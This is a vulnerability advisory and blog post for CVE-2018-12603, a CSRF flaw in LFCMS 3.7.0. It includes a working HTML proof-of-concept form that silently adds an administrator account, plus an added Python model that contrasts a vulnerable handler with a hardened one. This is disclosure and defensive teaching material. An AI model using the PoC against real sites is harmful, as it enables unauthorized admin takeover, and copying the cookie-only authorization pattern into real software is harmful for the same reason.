CVE-2018-12603:LFCMS_3.7.0

CVE-2018-12603
 
> [Suggested description]
> A CSRF vulnerability exists in LFCMS 3.7.0: an administrator account can be added arbitrarily.
>
> ------------------------------------------

> [Discoverer]
> Bay0net from JZXTSEC
>
> ------------------------------------------
>
> [Vulnerability Type]
> Cross Site Request Forgery (CSRF)
>
> ------------------------------------------

> [Affected Product Code Base]
> LFCMS - 3.7.0

> ------------------------------------------

> [Affected Component]
> The admin "add member" action (admin.php?s=/Member/add.html). After the administrator has logged in, opening the following page adds a new user:
https://www.cnblogs.com/v1vvwv/p/9203899.html 

> ------------------------------------------

> [Attack Type]
> Remote

> ------------------------------------------

> [Impact Code execution]
> true

> ------------------------------------------

> [Impact Escalation of Privileges]
> true

> ------------------------------------------

> [Attack Vectors]
> A logged-in LFCMS administrator is lured to an attacker-controlled page that submits a POST to admin.php?s=/Member/add.html. The browser attaches the administrator's session cookie, and the request is accepted without any anti-CSRF token.

> ------------------------------------------

> [Reference]
https://www.cnblogs.com/v1vvwv/p/9203899.html 
http://www.lfdycms.com/home/down/index/id/26.html

> ------------------------------------------
A CSRF vulnerability exists in LFCMS 3.7.0: an administrator account can be added arbitrarily.
 
After the administrator has logged in, opening the following page (and submitting its form) adds a new administrator account, admin2 with password admin2:
 
<html>
  <body>
    <!-- Cosmetic: rewrites the visible URL to "/" so the PoC path is not shown in the address bar -->
    <script>history.pushState('', '', '/')</script>
    <!-- Target is the tester's lab instance of LFCMS 3.7.0; the browser attaches the
         administrator's session cookie to this cross-site POST automatically -->
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <!-- Same fields the admin "add member" form submits; no anti-CSRF token is checked -->
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
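As an added example that is not part of the original post or of LFCMS itself, the following Python models the server-side decision behind this PoC: a handler that authorizes the add-member POST on the session cookie alone (the condition the CSRF exploits) next to one that additionally checks the Origin/Referer header and a per-session synchronizer token. LFCMS is PHP; the model is written in Python so both paths can be exercised against constructed requests offline. The Request class, the SESSIONS store, the PHPSESSID cookie name, the __token__ field name and the attacker.example origin are assumptions made for the illustration, not details taken from LFCMS.

```python
# Added example, not LFCMS code: LFCMS is PHP, so this models its admin
# "Member/add" handling in Python to contrast the cookie-only authorization the
# advisory describes with a hardened handler that also checks Origin/Referer and
# a per-session synchronizer token. Request, SESSIONS, PHPSESSID, the "__token__"
# field name and the attacker.example origin are constructed for illustration.
import hmac
import secrets
from dataclasses import dataclass
from urllib.parse import urlsplit

SITE_ORIGIN = "http://10.211.55.17"  # LFCMS host used in the PoC above
ADD_PATH = "/lfdycms3.7.0/admin.php?s=/Member/add.html"
TOKEN_FIELD = "__token__"  # assumed name of the hidden anti-CSRF form field
# Server-side session store, cookie value -> session data (one admin session).
SESSIONS = {"a1b2c3": {"user": "admin", "role": "admin", "csrf_token": None}}


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    cookies: dict
    form: dict


def session_for(req):
    return SESSIONS.get(req.cookies.get("PHPSESSID"))


def common_checks(req):
    """Routing, login and field validation shared by both handlers."""
    if req.method != "POST" or req.path != ADD_PATH:
        return (404, "not found")
    sess = session_for(req)
    if sess is None or sess.get("role") != "admin":
        return (403, "admin login required")
    if req.form.get("password") != req.form.get("repassword"):
        return (400, "passwords do not match")
    return None


def vulnerable_member_add(req):
    """Cookie-only authorization, the condition CVE-2018-12603 relies on: the
    browser attaches the admin's cookie to a cross-site POST, so the attacker's
    form is indistinguishable from the real admin form."""
    err = common_checks(req)
    return err or (200, "added " + req.form["username"])


def issue_csrf_token(sess):
    """Set when the real admin form is rendered. An attacker page cannot read
    it: the same-origin policy blocks reading LFCMS pages from another origin."""
    sess["csrf_token"] = secrets.token_hex(16)
    return sess["csrf_token"]


def request_origin(req):
    """Origin header if sent, else the Referer's origin, else None."""
    if req.headers.get("Origin"):
        return req.headers["Origin"]
    ref = req.headers.get("Referer")
    if ref:
        p = urlsplit(ref)
        return f"{p.scheme}://{p.netloc}"
    return None


def hardened_member_add(req):
    """Same handler with two independent CSRF defenses."""
    err = common_checks(req)
    if err:
        return err
    # 1. A cross-site form post carries the attacker's Origin/Referer. A
    #    missing header is tolerated only because the token check still runs.
    origin = request_origin(req)
    if origin is not None and origin != SITE_ORIGIN:
        return (403, "cross-site request rejected: " + origin)
    # 2. Synchronizer token bound to the session, compared in constant time.
    expected = session_for(req).get("csrf_token")
    supplied = req.form.get(TOKEN_FIELD, "")
    if not expected or not hmac.compare_digest(expected, supplied):
        return (403, "missing or invalid CSRF token")
    return (200, "added " + req.form["username"])


def attacker_form_post(extra_form=None, headers=None):
    """Constructed request: what the admin's browser sends when it submits the
    PoC form above from an attacker page (cookie included, no token)."""
    form = {"username": "admin2", "password": "admin2", "repassword": "admin2"}
    form.update(extra_form or {})
    if headers is None:
        headers = {"Origin": "http://attacker.example",
                   "Referer": "http://attacker.example/poc.html"}
    return Request("POST", ADD_PATH, headers, {"PHPSESSID": "a1b2c3"}, form)


def admin_form_post(token):
    """Constructed request: the admin submitting the genuine form on the site."""
    form = {"username": "ops", "password": "x", "repassword": "x", TOKEN_FIELD: token}
    return Request("POST", ADD_PATH, {"Origin": SITE_ORIGIN}, {"PHPSESSID": "a1b2c3"}, form)


if __name__ == "__main__":
    print(vulnerable_member_add(attacker_form_post()))  # (200, 'added admin2')
    tok = issue_csrf_token(SESSIONS["a1b2c3"])
    print(hardened_member_add(attacker_form_post()))    # (403, 'cross-site request rejected: ...')
    print(hardened_member_add(admin_form_post(tok)))    # (200, 'added ops')
```

Running the block shows the cross-site POST succeeding against the vulnerable handler and being refused by the hardened one, while the genuine admin submission carrying the token still succeeds. The Origin check alone would stop this PoC, since browsers set Origin on cross-site form POSTs, but the session-bound token is what still holds when the header is absent or stripped, so the two checks are kept independent rather than folded into one.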

References:

http://www.lfdycms.com/

http://www.lfdycms.com/home/lists/index/id/60.html

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603

posted @ 2018-06-20 15:10 Bay0net